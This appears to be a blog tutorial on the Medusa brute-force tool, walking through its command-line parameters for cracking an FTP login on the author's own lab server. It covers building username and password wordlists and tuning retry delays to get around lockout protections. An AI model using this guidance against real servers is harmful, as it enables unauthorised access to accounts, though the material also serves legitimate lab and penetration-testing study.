After a hiatus, I feel like diving into
cracking tools. I thought Medusa would be a nice fit for this
purpose. As most of you would know medusa is a cracking tool like
ncrack or hydra that can execute bruteforce attacks remotely. It
supports sorts of protocols such as SSH, Telnet, HTTP, HTTPS and many
more. Before we go, there are certain things we should know about how
ftp service works and what sort of limitations or restrictions hosts
can apply to these services. What is maximum number for failed login
attempts? Is it configured to ban clients after a certain number of
failed attempts? If yes, is it permanent or temporary? These facts
can pretty much hamper the process when cracking and eventually you
decide whether you cannot pull it off or need to add some parameters
to see if it works out.
For the sake of this tutorial, I
planned to use it with FTP cracking. I have prepared wordlists in
Kali Linux on a virtual machine and pre-installed ProFTPD 1.3.5 on my
laptop as a server machine. The valid username is username and
password is password123.
Medusa is fairly straightforward and
has a command-line interface. I should say it has mainly five
variables (parameters) in its use. One of them is where you specify
host address which -h stands for. It also allows you to have
wordlists containing multiple hosts (-H file directory for
lists) when you need to work on more than one host which is a pretty
rare case I guess. Next, we have a username section whose parameter
is -u or -U (upper case for lists). Like aircrack,
hydra etc. medusa uses lower case for defined entries. When you are
sure it has a username named admin then go ahead and put -u admin.
Similarly, it can be applied to password (-p or -P)
cases. Let us say you have no clue what these could be. In this
instance you should prepare wordlists for both usernames and
passwords. You should put a ready-to-use wordlist you can find
somewhere or compile a specific list by taking guesses about probable
usernames. Taking shots in the dark wouldn't help you without ever
knowing one of these at least. I recommend short lists that include
words you think are likely valid. Such as admin, root, me, ftp. Last
but not least, we need to specify the execution mode which will
define the protocol worked on. -M stands for mode. Below, we
have a couple of optional parameters to tweak your bruteforce
process.
Ftp server might have more than one
username. So when medusa find the correct username and password, it
never stops until the lists end. It normally tries all username and
password pairs in order. If you want it to stop bruteforcing once it
finds a valid one, you should add -f parameter. In case of
bruteforcing in login pages with HTTPS protocol, it has -s
parameter to enable SSL mode. -v stands for verbosity which
can be increased up to level six. It also offers you a convenience to
resume your previous scan with -Z parameter. Sometimes a
password or username comes to your mind and you could want to quickly
add it to the scan, there is a practical option with -e
parameter. Maybe ftp server could be delicately configured against
bruteforce attacks and you get blocked attempting. You can have fine
adjustments with sleep duration between retry attempts or maximum
retry number before giving up and so forth. For further information,
you should check out other parameters yourself and test them out
against your target in a vitual machine.
